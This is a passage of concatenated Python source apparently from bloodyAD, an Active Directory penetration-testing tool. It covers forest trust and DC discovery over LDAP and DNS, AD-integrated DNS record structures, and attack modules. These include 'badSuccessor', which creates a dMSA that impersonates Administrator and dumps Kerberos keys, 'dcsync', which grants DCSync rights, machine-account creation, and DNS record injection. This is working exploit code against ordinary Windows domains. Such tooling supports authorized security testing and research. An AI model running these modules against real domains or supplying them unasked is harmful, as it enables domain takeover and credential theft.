                await asyncio.gather(*tasks)

        if not trust_dict:
            LOG.warning("[!] No Trusts found")
        return trust_dict

    async def fetchTrusts(self, conn, trust_dict, dns, domain_name="", allow_gc=True):
        # Search request to look into all available domain partitions on the dc for trusts relationships
        # We don't care if because of simultaneous dc search there are duplicates, the overhead is minor, trusts are not many
        search_params = {
            "base": "",
            "ldap_filter": "(objectClass=trustedDomain)",
            "attr": [
                "trustDirection",
                "trustPartner",
                "trustAttributes",
                "trustType",
                "securityIdentifier",
            ],
            "search_scope": Scope.SUBTREE,
            "raw": True,
            "controls": [phantomRoot()],
        }
        trusts = await self.searchInForest(
            conn, search_params, dns, domain_name, allow_gc
        )
        # Tree root is the DC domain
        trust_to_explore = {}
        for trust in trusts:
            already_in_tree = (
                ((trust["distinguishedName"]).rsplit("CN=System,", 1)[1]).replace(
                    "DC=", ""
                )
            ).replace(",", ".")
            if already_in_tree not in trust_dict:
                trust_dict[already_in_tree] = {}
            trust_dict[already_in_tree][trust["trustPartner"][0].decode()] = trust

            # Let's not waste a run of fetchTrusts and keep active track of it so we can reuse it later
            self._trustmap[already_in_tree]["conn"] = trust["parent_conn"]
            self._trustmap[trust["trustPartner"][0].decode()]["domsid"] = str(
                dtyp.sid.SID.from_bytes(trust["securityIdentifier"][0])
            )

            # We already have access to all the partitions of the forest through the GC we don't need to connect to other forest DCs
            if (
                common.TRUST_ATTRIBUTES["WITHIN_FOREST"]
                & int(trust["trustAttributes"][0].decode())
                > 0
            ):
                continue
            # We assume user belongs to forest of provided DC in --host so we can explore external trusts only if we can auth on them (inbound)
            if (
                common.TRUST_DIRECTION["INBOUND"]
                & int(trust["trustDirection"][0].decode())
                > 0
            ):
                # NOTE: If we need later we can add more than one parent_conn as a failsafe and then try to co to trust with more than one parent_conn
                # Useful when using kerberos and performing cross realm
                trust_to_explore[trust["trustPartner"][0].decode()] = trust[
                    "parent_conn"
                ]
        return trust_to_explore

    async def searchInForest(
        self, conn, search_params, dns, domain_name="", allow_gc=True
    ):
        # If domain_name is provided it means we try to reach a domain outside of current "conn" forest so we have to find a server that we can reach for this outsider domain and then we search the entire forest related to this outsider domain
        newconn = conn
        if domain_name:
            host_params = await findReachableDomainServer(
                domain_name,
                newconn.ldap.current_site,
                server_type="" if allow_gc else "ldap",
                dns_addr=dns,
                dc_dns=newconn.conf.dcip,
            )
            if not host_params:
                LOG.warning(
                    f"[!] No reachable server found for {domain_name}, try to provide one"
                    " manually in --host"
                )
                return {}
            schemes = {389: "ldap", 636: "ldaps", 3268: "gc", 3269: "gc-ssl"}
            newconn = conn.copy(
                scheme=schemes[host_params["port"]],
                host=host_params["name"],
                dcip=host_params["ip"],
            )

        search_results = []
        # dc is a gc for this forest, hosting every records we want, we don't need to look for other domain partitions on other dc
        # Except if we're looking for attributes no replicated in GC, then searchInForest must be called with allow_gc=False
        if newconn.ldap.is_gc and allow_gc:
            search_results = await self.searchInPartition(
                newconn, search_params, dns, allow_gc=allow_gc
            )
            if newconn != conn and newconn._ldap:
                newconn.ldap.close()
            return search_results

        # Find all domain partitions in the forest and dc hosting them
        try:
            # Get all domain partitions in the forest
            # partitions = conn.ldap.bloodysearch("CN=Partitions," + conn.ldap.configNC, "(&(objectClass=crossRef)(systemFlags=3))", attr=["nCName"])
            # Find nTDSDSA objects containing msDS-HasDomainNCs and server objects parents containing dNSHostname
            entries = newconn.ldap.bloodysearch(
                "CN=Sites," + newconn.ldap.configNC,
                "(|(objectClass=nTDSDSA)(objectClass=server))",
                search_scope=Scope.SUBTREE,
                attr=["msDS-HasDomainNCs", "dNSHostName", "objectClass"],
            )
            # Put domain partitions and hostnames together by matching server distinguished name on them
            forest_servers = collections.defaultdict(dict)
            for entry in entries:
                if "server" in entry["objectClass"]:
                    try:
                        forest_servers[entry["distinguishedName"]]["host"] = entry[
                            "dNSHostName"
                        ]
                    except KeyError:
                        LOG.warning(
                            f"[!] No dNSHostName found for DC {entry['distinguishedName']}, the DC may have been demoted or have synchronization issues"
                        )
                else:
                    parent_name = (entry["distinguishedName"]).split(",", 1)[1]
                    try:
                        forest_servers[parent_name]["partitions"] = entry[
                            "msDS-HasDomainNCs"
                        ]
                    except:
                        print("There was some error here")

            # Reorganize dict on domain so domain becomes the key containing the hosts
            forest_partitions = collections.defaultdict(list)
            for dn, attributes in forest_servers.items():
                if "host" not in attributes:
                    LOG.warning(
                        f"[!] No dNSHostName found for DC {dn}, the DC may have been demoted or have synchronization issues"
                    )
                for p in attributes.get("partitions"):
                    forest_partitions[p].append(
                        {"type": ["A", "AAAA"], "name": attributes["host"]}
                    )
            tasks = []
            for p, hosts in forest_partitions.items():
                host_list = hosts
                # if newconn already has this partition don't provide new hosts to connect to
                if p in newconn.ldap._serverinfo["namingContexts"]:
                    host_list = []
                tasks.append(
                    self.searchInPartition(
                        newconn, search_params, dns, p, host_list, allow_gc=allow_gc
                    )
                )
            search_results = await asyncio.gather(*tasks)
            search_results = [entry for entries in search_results for entry in entries]
        except Exception as e:
            LOG.error(
                f"[!] Something went wrong when trying to perform searchInForest for {domain_name}"
            )
            LOG.error(f"[!] Error {type(e).__name__}: {e}")
        finally:
            if newconn != conn and newconn._ldap:
                newconn.ldap.close()
            return search_results

    async def searchInPartition(
        self,
        conn,
        bloodysearch_params,
        dns,
        partition="",
        host_records=None,
        allow_gc=True,
    ):
        schemes = {389: "ldap", 636: "ldaps", 3268: "gc", 3269: "gc-ssl"}
        ports = [389, 636]
        if allow_gc:
            ports += [3268, 3269]
        # If host_records empty means the dc in "conn" is already the one we want to query
        if host_records:
            host_params = await findReachableServer(
                host_records, dns, conn.conf.dcip, ports=ports
            )
            if not host_params:
                LOG.warning(
                    f"[!] No reachable server found for {partition}, try to provide one"
                    " manually in --host"
                )
                return {}
            newconn = conn.copy(
                scheme=schemes[host_params["port"]],
                host=host_params["name"],
                dcip=host_params["ip"],
            )

        else:
            newconn = conn

        search_result = []
        try:
            if bloodysearch_params["base"] == "domainNC":
                # The directory can be handled by others instances of the function so we have to duplicate it before modifying it
                bloodysearch_params = dict(bloodysearch_params)
                bloodysearch_params["base"] = newconn.ldap.domainNC
            # We add parent_conn to know which conn has the trust, useful for krb cross realm
            search_result = [
                {"parent_conn": newconn, **entry}
                for entry in newconn.ldap.bloodysearch(**bloodysearch_params)
            ]
        except Exception as e:
            LOG.error(
                f"[!] Something went wrong when trying to perform this ldap search: {bloodysearch_params} on {newconn.conf.host} with the {newconn.conf.scheme} protocol"
            )
            LOG.error(f"[!] Error {type(e).__name__}: {e}")
        finally:
            if newconn != conn and newconn._ldap:
                newconn.ldap.close()
            return search_result


# Find LDAP or GC server based on current AD site
async def findReachableDomainServer(
    domain_or_forest_name, ad_site, server_type="", dns_addr="", dc_dns=""
):
    record_list = []
    ports = []
    if not server_type or server_type == "gc":
        record_list += [
            {
                "type": ["SRV"],
                "name": f"_gc._tcp.{ad_site}._sites.{domain_or_forest_name}",
            },
            {"type": ["SRV"], "name": f"_gc._tcp.{domain_or_forest_name}"},
        ]
        ports += [3268, 3269]
    if not server_type or server_type == "ldap":
        record_list += [
            {
                "type": ["SRV"],
                "name": f"_ldap._tcp.{ad_site}._sites.{domain_or_forest_name}",
            },
            {"type": ["SRV"], "name": f"_ldap._tcp.{domain_or_forest_name}"},
        ]
        ports += [389, 636]
    host_params = await findReachableServer(record_list, dns_addr, dc_dns, ports)
    return host_params


# Do 389 even for GC because more probabilities to bypass fw
# 389 LDAP, 636 LDAPS, 3268 GC, 3269 GCS
async def findReachableServer(
    record_list, dns_addr="", dc_dns="", ports=None
):
    if ports is None:
        ports = [389, 636, 3268, 3269]
    nameservers = [] + (resolver.get_default_resolver()).nameservers
    if dc_dns:
        nameservers = [dc_dns] + nameservers
    if dns_addr:
        nameservers = [dns_addr] + nameservers
    LOG.debug(f"[+] Nameservers set to: {nameservers}")

    # Try to find a dc where we can connect asap
    resolve_tasks = []
    for ns in nameservers:
        for r in record_list:
            resolve_tasks.append(
                asyncio.create_task(asyncResolveAndConnect(ns, r, ports))
            )

    host_params = await wait_first(resolve_tasks)
    return host_params


# Try to reach a host by first resolving its IPv4 or v6 by providing a nameserver and SRV, A or AAAA records
# Then trying to do a tcp connect on all hosts found, first answering will be returned
async def asyncResolveAndConnect(ns, r, ports):
    custom_resolver = resolver.Resolver()
    custom_resolver.nameservers = [ns]
    target_srvs = collections.defaultdict(list)
    answer = None
    LOG.debug(f"[*] Resolving {r}...")
    for rtype in r["type"]:
        try:
            answer = custom_resolver.resolve(r["name"], rtype, tcp=True)
            # SRV records
            if answer.rdtype == rdatatype.SRV:
                # Try to get IPs from additional part of the answer if there is one
                for raddi in answer.response.additional:
                    if raddi.rdtype in [rdatatype.A, rdatatype.AAAA]:
                        for raddr in raddi:
                            target_srvs[str(raddi.name)].append(raddr.address)
                # If no additional part we have to make other queries
                if not target_srvs:
                    for rsrv in answer:
                        for rsrv_type in ["A", "AAAA"]:
                            try:
                                target_srvs[rsrv.target.to_text()] += [
                                    rdata.address
                                    for rdata in custom_resolver.resolve(
                                        rsrv.target.to_text(), rsrv_type, tcp=True
                                    )
                                ]
                            except Exception as e:
                                LOG.debug(
                                    f"[!] Failed to resolve {rsrv.target.to_text()} {rsrv_type} with nameserver {ns}: {e}"
                                )
                                continue
            # A and AAAA records
            else:
                target_srvs[r["name"]] += [raddr.address for raddr in answer]

        except Exception as e:
            LOG.debug(
                f"[!] Failed to resolve {r['name']} {rtype} with nameserver {ns}: {e}"
            )
            continue

    # If the function failed to find hosts
    if not target_srvs:
        return {}

    # We try every combination of ips/ports, useful if there are firewalls
    # And we take the first to answer, we need only one having the replicas we need
    connect_tasks = []
    for port in ports:
        for target_ips in target_srvs.values():
            for ip in target_ips:
                connect_tasks.append(asyncio.create_task(host_connect(ip, port)))

    host_params = await wait_first(connect_tasks)
    # Function couldn't reach a host for this record
    if not host_params:
        return {}

    for name, ips in target_srvs.items():
        if host_params["ip"] in ips:
            if name.endswith("."):
                name = name.rstrip(".")
            host_params["name"] = name
            break
    return host_params


async def host_connect(ip, port):
    # Even if a dc doesn't support tls with ldap/gc it will accept the tcp connection
    # so we start a tls handshake on those port to be sure it handles tls
    ssl_context = None
    if port in [636, 3269]:
        ssl_context = ssl.create_default_context()
        ssl_context.check_hostname = False
        ssl_context.verify_mode = ssl.CERT_NONE
    try:
        LOG.debug(f"[*] Attempting to TCP connect to {ip}:{port}")
        reader, writer = await asyncio.open_connection(ip, port, ssl=ssl_context)
        writer.close()
        await writer.wait_closed()
        return {"ip": ip, "port": port}
    except:
        LOG.debug(f"[!] Could not TCP connect to {ip}:{port}")
        return {}


async def wait_first(tasks):
    while tasks:
        finished, unfinished = await asyncio.wait(
            tasks, return_when=asyncio.FIRST_COMPLETED
        )
        for x in finished:
            result = x.result()
            if result:
                if unfinished:
                    # cancel the other tasks, we have a result. We need to wait for the cancellations
                    # to propagate.
                    LOG.debug(f"[*] Cancelling {len(unfinished)} remaining tasks")
                    for task in unfinished:
                        task.cancel()
                    await asyncio.wait(unfinished)
                return result
        tasks = unfinished
    return



from bloodyAD.formatters.structure import Structure
import ipaddress

# Credits to dirkjanm and his tool adidnsdump
"""
DNS_RECORD_TYPE - [MS-DNSP] section 2.2.2.1.1
Prefix DNS_TYPE_ has been removed for implementation purposes and only a subset of constants is implemented
"""
DNS_RECORD_TYPE = {
    "A": 0x1,
    "AAAA": 0x1C,
    "CNAME": 0x5,
    "MX": 0xF,
    "PTR": 0xC,
    "SRV": 0x21,
    "TXT": 0x10,
    "NS": 0x2,
    "SOA": 0x6,
}


class Record(Structure):
    """
    dnsRecord - [MS-DNSP] section 2.3.2.2
    """

    structure = (
        ("DataLength", "<H-Data"),
        ("Type", "<H"),
        ("Version", "B=5"),
        ("Rank", "B"),
        ("Flags", "<H=0"),
        ("Serial", "<I"),
        ("TtlSeconds", ">I"),
        ("Reserved", "<I=0"),
        ("TimeStamp", "<I=0"),
        ("Data", ":"),
    )

    def toDict(self):
        dnstype = None
        for k, v in DNS_RECORD_TYPE.items():
            if self["Type"] == v:
                dnstype = k

        record_data = None
        if dnstype == "A":
            record_data = DNS_RPC_RECORD_A(self["Data"]).toDict()
        elif dnstype == "AAAA":
            record_data = DNS_RPC_RECORD_AAAA(self["Data"]).toDict()
        elif dnstype in ["NS", "CNAME", "PTR"]:
            record_data = DNS_RPC_RECORD_NODE_NAME(self["Data"]).toDict()
        elif dnstype == "MX":
            record_data = DNS_RPC_RECORD_NAME_PREFERENCE(self["Data"]).toDict()
        elif dnstype == "SRV":
            record_data = DNS_RPC_RECORD_SRV(self["Data"]).toDict()
        elif dnstype == "TXT":
            record_data = DNS_RPC_RECORD_STRING(self["Data"]).formatCanonical()
        elif dnstype == "SOA":
            record_data = DNS_RPC_RECORD_SOA(self["Data"]).toDict()
        else:
            dnstype = self["Type"]
            record_data = self["Data"]

        return {"Data": record_data, "Type": dnstype, "TtlSeconds": self["TtlSeconds"]}

    def fromDict(
        self,
        data,
        dnstype,
        ttl,
        rank,
        serial,
        preference=None,
        port=None,
        priority=None,
        weight=None,
    ):
        self["Rank"] = rank
        self["Serial"] = serial
        self["Type"] = DNS_RECORD_TYPE[dnstype]
        self["TtlSeconds"] = ttl

        if dnstype == "A":
            record_data = DNS_RPC_RECORD_A()
            record_data.fromCanonical(data)
        elif dnstype == "AAAA":
            record_data = DNS_RPC_RECORD_AAAA()
            record_data.fromCanonical(data)
        elif dnstype in ["NS", "CNAME", "PTR"]:
            record_data = DNS_RPC_RECORD_NODE_NAME()
            record_data.fromCanonical(data)
        elif dnstype == "MX":
            record_data = DNS_RPC_RECORD_NAME_PREFERENCE()
            record_data.fromCanonical(data, preference)
        elif dnstype == "SRV":
            record_data = DNS_RPC_RECORD_SRV()
            record_data.fromCanonical(data, port, priority, weight)
        elif dnstype == "TXT":
            record_data = DNS_RPC_RECORD_STRING()
            record_data.fromCanonical(data)
        else:
            raise TypeError(f"{dnstype} not supported")

        self["Data"] = record_data.getData()


class DNS_RPC_RECORD_A(Structure):
    """
    DNS_RPC_RECORD_A - [MS-DNSP] section 2.2.2.2.4.1
    """

    structure = (("address", "!I"),)

    def toDict(self):
        return self.formatCanonical()

    def formatCanonical(self):
        return str(ipaddress.IPv4Address(self["address"]))

    def fromCanonical(self, canonical):
        self["address"] = int(ipaddress.IPv4Address(canonical))


class DNS_RPC_RECORD_AAAA(Structure):
    """
    DNS_RPC_RECORD_AAAA - [MS-DNSP] section 2.2.2.2.4.17
    """

    structure = (("ipv6Address", "!16s"),)

    def toDict(self):
        return self.formatCanonical()

    def formatCanonical(self):
        return str(ipaddress.IPv6Address(self["ipv6Address"]))

    def fromCanonical(self, canonical):
        self["ipv6Address"] = ipaddress.IPv6Address(canonical).packed


class DNS_COUNT_NAME(Structure):
    """
    DNS_COUNT_NAME - [MS-DNSP] section 2.2.2.2.2
    Used for FQDNs in LDAP communication
    MUST be converted to DNS_RPC_NAME for RPC communication
    """

    structure = (("Length", "B-RawName"), ("LabelCount", "B"), ("RawName", ":"))

    def formatCanonical(self):
        ind = 0
        labels = []
        for i in range(self["LabelCount"]):
            nextlen = int.from_bytes(self["RawName"][ind : ind + 1], byteorder="big")
            labels.append(self["RawName"][ind + 1 : ind + 1 + nextlen].decode("utf-8"))
            ind += nextlen + 1
        # For the final dot, but do we really want to display it?
        # labels.append("")
        return ".".join(labels)

    def fromCanonical(self, canonical):
        # Removes empty strings
        labels = [label for label in canonical.split(".") if label]
        label_count = 0
        raw_name = b""
        for label in labels:
            label_count += 1
            raw_name += len(label).to_bytes(1, byteorder="big") + label.encode("utf-8")
        raw_name += b"\x00"
        self["LabelCount"] = label_count
        self["RawName"] = raw_name


class DNS_RPC_RECORD_NODE_NAME(Structure):
    """
    DNS_RPC_RECORD_NODE_NAME - [MS-DNSP] section 2.2.2.2.4.2
    Used for CNAME records
    """

    structure = (("nameNode", ":", DNS_COUNT_NAME),)

    def toDict(self):
        return self["nameNode"].formatCanonical()

    def fromCanonical(self, canonical):
        record_name = DNS_COUNT_NAME()
        record_name.fromCanonical(canonical)
        self["nameNode"] = record_name


class DNS_RPC_RECORD_NAME_PREFERENCE(Structure):
    """
    DNS_RPC_RECORD_NAME_PREFERENCE - [MS-DNSP] section 2.2.2.2.4.8
    Used for MX records
    """

    structure = (("wPreference", ">H"), ("nameExchange", ":", DNS_COUNT_NAME))

    def toDict(self):
        return {
            "Name": self["nameExchange"].formatCanonical(),
            "Preference": self["wPreference"],
        }

    def fromCanonical(self, fqdn, preference):
        self["wPreference"] = preference
        record_name = DNS_COUNT_NAME()
        record_name.fromCanonical(fqdn)
        self["nameExchange"] = record_name


class DNS_RPC_RECORD_SRV(Structure):
    """
    DNS_RPC_RECORD_SRV - [MS-DNSP] section 2.2.2.2.4.18
    """

    structure = (
        ("wPriority", ">H"),
        ("wWeight", ">H"),
        ("wPort", ">H"),
        ("nameTarget", ":", DNS_COUNT_NAME),
    )

    def toDict(self):
        return {
            "Target": self["nameTarget"].formatCanonical(),
            "Port": self["wPort"],
            "Priority": self["wPriority"],
            "Weight": self["wWeight"],
        }

    def fromCanonical(self, fqdn, port, priority, weight):
        self["wPriority"] = priority
        self["wWeight"] = weight
        self["wPort"] = port
        record_name = DNS_COUNT_NAME()
        record_name.fromCanonical(fqdn)
        self["nameTarget"] = record_name


class DNS_RPC_NAME(Structure):
    """
    DNS_RPC_NAME - [MS-DNSP] section 2.2.2.2.1
    Used for FQDN in RPC communications and other strings
    """

    structure = (("cchNameLength", "B-dnsName"), ("dnsName", ":"))

    def formatCanonical(self):
        return self["dnsName"].decode("utf-8")


class DNS_RPC_RECORD_STRING(Structure):
    """
    DNS_RPC_RECORD_STRING - [MS-DNSP] section 2.2.2.2.4.6
    Used for TXT records
    """

    structure = (("stringData", ":", DNS_RPC_NAME),)

    def formatCanonical(self):
        return self["stringData"].formatCanonical()

    def fromCanonical(self, canonical):
        data_container = DNS_RPC_NAME()
        data_container["dnsName"] = canonical.encode("utf-8")
        self["stringData"] = data_container


class DNS_RPC_RECORD_SOA(Structure):
    """
    DNS_RPC_RECORD_SOA - [MS-DNSP] section 2.2.2.2.4.3
    """

    structure = (
        ("dwSerialNo", ">I"),
        ("dwRefresh", ">I"),
        ("dwRetry", ">I"),
        ("dwExpire", ">I"),
        ("dwMinimumTtl", ">I"),
        ("namePrimaryServer", ":", DNS_COUNT_NAME),
        ("zoneAdminEmail", ":", DNS_COUNT_NAME),
    )

    def toDict(self):
        return {
            "SerialNo": self["dwSerialNo"],
            "Refresh": self["dwRefresh"],
            "Retry": self["dwRetry"],
            "Expire": self["dwExpire"],
            "MinimumTtl": self["dwMinimumTtl"],
            "PrimaryServer": self["namePrimaryServer"].formatCanonical(),
            "zoneAdminEmail": self["zoneAdminEmail"].formatCanonical(),
        }



import binascii, datetime, random, string, base64, collections, asyncio
from typing import Literal
from urllib import parse
from bloodyAD import utils
from bloodyAD.network import ldap
from bloodyAD.exceptions import LOG
from bloodyAD.formatters import accesscontrol, common, cryptography, dns
from bloodyAD.network.ldap import Change, Scope
from bloodyAD.exceptions import BloodyError
from bloodyAD.cli_modules import set as bloodySet
import msldap
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from minikerberos.common import factory
from minikerberos.common.spn import KerberosSPN
from minikerberos.common.kirbi import Kirbi
from minikerberos.common.ccache import CCACHE
from minikerberos.protocol.external import ticketutil
from minikerberos.protocol.encryption import Enctype
from winacl.dtyp.security_descriptor import SECURITY_DESCRIPTOR


# TODO make it multi forest
def badSuccessor(conn, dmsa: str, t: list = ["CN=Administrator,CN=Users,DC=Current,DC=Domain"], ou: str = None):
    """
    Add a new DMSA (Dedicated Managed Service Account) object

    :param dmsa: hostname of the DMSA object (no need to add '$')
    :param t: Distinguished Name of the target whose privileges are to be assumed (can be called multiple times, e.g. "-t CN=Admin,CN=Users,DC=domain,DC=com -t CN=User,CN=Users,DC=domain,DC=com")
    :param ou: Organizational Unit for the DMSA object. If not provided, chooses the first OU the logged user can add child to.
    """
    # Check if the schema version is 2025
    schema_version = next(
        conn.ldap.bloodysearch(
            conn.ldap.schemaNC, attr=["objectVersion"]
        )
    ).get("objectVersion", None)

    if int(schema_version[0]) < 91:
        raise BloodyError("Schema version is not 2025. DMSA creation is not supported.")

    if len(t) == 1:
        t = ["CN=Administrator,CN=Users," + conn.ldap.domainNC]
    else:
        t = t[1:]

    # First we try to find a OU where we can add a child object
    # If we don't find one, we will use the first one where we have DACL write on
    # If we don't find one, we will use the first one where we have ownership write on
    if not ou:
        writable_ou = []
        writable_nt_ou = []
        writable_owner_ou = []
        for entry in conn.ldap.bloodysearch(
            conn.ldap.domainNC,
            ldap_filter="(|(objectClass=container)(objectClass=organizationalUnit))",
            search_scope=Scope.SUBTREE,
            attr=["distinguishedName", "allowedChildClassesEffective", "sDRightsEffective"],
        ):
            sdright_mask = entry.get("sDRightsEffective", 0)
            if "msDS-DelegatedManagedServiceAccount" in entry.get("allowedChildClassesEffective", []):
                if entry["distinguishedName"] == "CN=Managed Service Accounts," + conn.ldap.domainNC:
                    # Choose Managed Service Accounts in priority as it is the default for dMSA
                    ou = entry["distinguishedName"]
                    break
                writable_ou.append(entry["distinguishedName"])
            elif sdright_mask & 4:
                # We have DACL write on the OU
                writable_nt_ou.append(entry["distinguishedName"])
            elif sdright_mask & 3:
                # We have ownership write on the OU
                writable_owner_ou.append(entry["distinguishedName"])

        if not ou:
            if writable_ou:
                # Choose the first OU we can add child to
                ou = writable_ou[0]
            elif writable_nt_ou:
                ou = writable_nt_ou[0]
                genericAll(conn, ou, conn.conf.username)
            elif writable_owner_ou:
                ou = writable_owner_ou[0]
                bloodySet.owner(conn, ou, conn.conf.username)
                genericAll(conn, ou, conn.conf.username)
            else:
                raise BloodyError("No suitable OU found for adding the DMSA object")

    dmsa_dn = f"CN={dmsa},{ou}"

    new_sd = accesscontrol.createEmptySD()
    access_mask = accesscontrol.ACCESS_FLAGS["GENERIC_ALL"]
    self_obj = next(conn.ldap.bloodysearch(conn.ldap.domainNC,
            ldap_filter=f"(sAMAccountName={conn.conf.username})",
            search_scope=Scope.SUBTREE, attr=["objectSid"]))
    self_sid = self_obj["objectSid"]
    utils.addRight(new_sd, self_sid, access_mask)

    dmsa_sama = dmsa + "$"
    LOG.info(f"[*] Creating DMSA {dmsa_sama} in {ou}")
    LOG.info(f"[*] Impersonating: {', '.join(t)}")
    attr = {
        "objectClass": ["msDS-DelegatedManagedServiceAccount"],
        "sAMAccountName": dmsa+'$',
        "dNSHostName": f"{dmsa}.{conn.ldap.dc_domain}",
        "msDS-ManagedPasswordInterval": 30,
        "msDS-GroupMSAMembership": SECURITY_DESCRIPTOR.from_sddl(f"O:S-1-5-32-544D:(A;;0xf01ff;;;{self_sid})"),
        "msDS-DelegatedMSAState": 2,
        "msDS-ManagedAccountPrecededByLink": t,
        "msDS-SupportedEncryptionTypes": 0x1c,
        "userAccountControl": 0x1000
    }
    conn.ldap.bloodyadd(dmsa_dn, attributes=attr)

    client = None
    path = dmsa + "_" + "".join(
            random.choice(string.ascii_letters + string.digits) for i in range(2)
        )
    splitted_url = conn.ldap.co_url.split("-",1)
    if "sspi" in splitted_url[0]:
        LOG.error("[-] SSPI is not supported yet to retrieve dMSA TGT, use Rubeus or minikerberos certstore, e.g.:")
        LOG.error(f"python minikerberos-bAD/examples/getS4U2self.py 'kerberos+certstore://{conn.conf.domain}\\{conn.conf.username}@192.168.100.5' 'krbtgt/{conn.ldap.dc_domain}@{conn.ldap.dc_domain}' '{dmsa_sama}@{conn.ldap.dc_domain}' --dmsa")
        return
    url = "kerberos+" + splitted_url[1]
    LOG.debug(f"[*] Using minikerberos url: {url}")
    try:
        cu = factory.KerberosClientFactory.from_url(url)
        client = cu.get_client_blocking()
        service_spn = KerberosSPN.from_spn(f"krbtgt/{conn.ldap.dc_domain}@{conn.ldap.dc_domain}")
        target_user = KerberosSPN.from_upn(f"{dmsa_sama}@{conn.ldap.dc_domain}")
        tgs, encTGSRepPart, key = client.S4U2self(target_user, service_spn, is_dmsa=True)
    except Exception as e:
        LOG.error(f"[-] Failed to retrieve dMSA TGT")
        LOG.error("[-] Try using Rubeus, or something like:")
        LOG.error(f"python minikerberos-bAD/examples/getS4U2self.py '{url}' 'krbtgt/{conn.ldap.dc_domain}@{conn.ldap.dc_domain}' '{dmsa_sama}@{conn.ldap.dc_domain}' --dmsa")
        raise e

    kirbi = Kirbi.from_ticketdata(tgs, encTGSRepPart)
    LOG.info(str(kirbi))

    ccache = CCACHE().from_kirbi(kirbi)
    ccache_path = path + ".ccache"
    ccache.to_file(path + ".ccache")
    LOG.info('[+] dMSA TGT stored in ccache file %s' % ccache_path)

    dmsa_pack = ticketutil.get_KRBKeys_From_TGSRep(encTGSRepPart)

    LOG.info('\ndMSA current keys found in TGS:')
    for current_key in dmsa_pack['current-keys']:
        LOG.info("%s: %s" % (Enctype.get_name(current_key['keytype']), current_key['keyvalue'].hex()))
    LOG.info('\ndMSA previous keys found in TGS (including keys of preceding managed accounts):')
    for previous_key in dmsa_pack['previous-keys']:
        LOG.info("%s: %s" % (Enctype.get_name(previous_key['keytype']), previous_key['keyvalue'].hex()))


def computer(conn, hostname: str, newpass: str, ou: str = "DefaultOU", lifetime: int = 0):
    """
    Add new computer

    :param hostname: computer name (without trailing $)
    :param newpass: password for computer
    :param ou: Organizational Unit for computer
    :param lifetime: lifetime of new computer in seconds, if non-zero creates it as a dynamic object
    """

    if ou == "DefaultOU":
        container = None
        # When the requester has specified the LDAP_SERVER_BYPASS_QUOTA_OID control "1.2.840.113556.1.4.2256"
        # And has been granted the control access right DS-Bypass-Quota on the object
        # that is the root of the NC in which the operation is to be performed
        for obj in next(
            conn.ldap.bloodysearch(conn.ldap.domainNC, attr=["wellKnownObjects"], controls=[("1.2.840.113556.1.4.2256", False, None)])
        )["wellKnownObjects"]:
            if "GUID_COMPUTERS_CONTAINER_W" == obj.binary_value:
                container = obj.dn
                break
        if not container:
            LOG.warning(
                "Default container for computers not found, defaulting to CN=Computers,"
                + conn.ldap.domainNC
            )
            container = "cn=Computers" + conn.ldap.domainNC
        computer_dn = f"cn={hostname},{container}"
    else:
        computer_dn = f"cn={hostname},{ou}"

    # Default computer SPNs
    spns = [
        "HOST/%s" % hostname,
        "HOST/%s.%s" % (hostname, conn.ldap.dc_domain),
        "RestrictedKrbHost/%s" % hostname,
        "RestrictedKrbHost/%s.%s" % (hostname, conn.ldap.dc_domain),
    ]
    attr = {
        "objectClass": [
            "top",
            "person",
            "organizationalPerson",
            "user",
            "computer",
        ],
        "dnsHostName": "%s.%s" % (hostname, conn.ldap.dc_domain),
        "userAccountControl": 0x1000,
        "servicePrincipalName": spns,
        "sAMAccountName": f"{hostname}$",
        "unicodePwd": '"%s"' % newpass,
    }

    if lifetime > 0:
        attr["objectClass"].append("dynamicObject")
        attr["entryTTL"] = lifetime
    
    conn.ldap.bloodyadd(computer_dn, attributes=attr)
    LOG.info(f"[+] {hostname}$ created")


def dcsync(conn, trustee: str):
    """
    Add DCSync right on domain to provided trustee (Requires to own or to have WriteDacl on domain object)

    :param trustee: sAMAccountName, DN or SID of the trustee
    """
    new_sd, _ = utils.getSD(conn, conn.ldap.domainNC)
    if "s-1-" in trustee.lower():
        trustee_sid = trustee
    else:
        trustee_sid = next(conn.ldap.bloodysearch(trustee, attr=["objectSid"]))[
            "objectSid"
        ]
    access_mask = accesscontrol.ACCESS_FLAGS["ADS_RIGHT_DS_CONTROL_ACCESS"]
    utils.addRight(new_sd, trustee_sid, access_mask)

    req_flags = msldap.wintypes.asn1.sdflagsrequest.SDFlagsRequestValue(
        {"Flags": accesscontrol.DACL_SECURITY_INFORMATION}
    )
    controls = [("1.2.840.113556.1.4.801", True, req_flags.dump())]

    conn.ldap.bloodymodify(
        conn.ldap.domainNC,
        {"nTSecurityDescriptor": [(Change.REPLACE.value, new_sd.getData())]},
        controls,
    )

    LOG.info(f"[+] {trustee} is now able to DCSync")


# Credits to Kevin Robertson and his script Invoke-DNSUpdate.ps1 from the Powermad framework
def dnsRecord(
    conn,
    name: str,
    data: str,
    dnstype: Literal["A", "AAAA", "CNAME", "MX", "PTR", "SRV", "TXT"] = "A",
    zone: str = "CurrentDomain",
    ttl: int = 300,
    preference: int = 10,
    port: int = None,
    priority: int = 10,
    weight: int = 60,
    forest: bool = False,
):
    """
    This function adds a new DNS record into an AD environment.

    :param name: name of the dnsNode object (hostname) which will contain the new record
    :param data: DNS record data, for most record types this will be the destination hostname or IP address, for TXT records this can be used for text
    :param dnstype: DNS record type
    :param zone: DNS zone
    :param ttl: DNS record TTL, time in seconds the record stays in DNS caches, must be low if you want to propagate record updates quickly
    :param preference: DNS MX record preference, must be lower than the concurrent records to be chosen
    :param port: listening port of the service in a DNS SRV record
    :param priority: priority of a DNS SRV record against concurrent, must be lower to be chosen, if identical to others, highest weight will be chosen
    :param weight: weight of a DNS SRV record against concurrent, must be higher with the lowest priority to be chosen
    :param forest: if set, registers dns record in forest instead of domain
    """
    # DNS_RPC_RECORD - section 2.2.2.2.5
    # RANK_ZONE - The record comes from an authoritative zone
    rank = 0xF0

    naming_context = "," + conn.ldap.domainNC
    if zone == "CurrentDomain":
        zone = ""
        for label in naming_context.split(",DC="):
            if label:
                zone += "." + label
        if forest:
            zone = "_msdcs" + zone
        else:
            # Removes first dot
            zone = zone[1:]

    # TODO: take into account custom ForestDnsZones and DomainDnsZones partition name ?
    if forest:
        zone_type = "ForestDnsZones"
    else:
        zone_type = "DomainDnsZones"

    zone_dn = f"DC={zone},CN=MicrosoftDNS,DC={zone_type}{naming_context}"
    record_dn = None

    serial = None
    new_dnsrecord_list = None
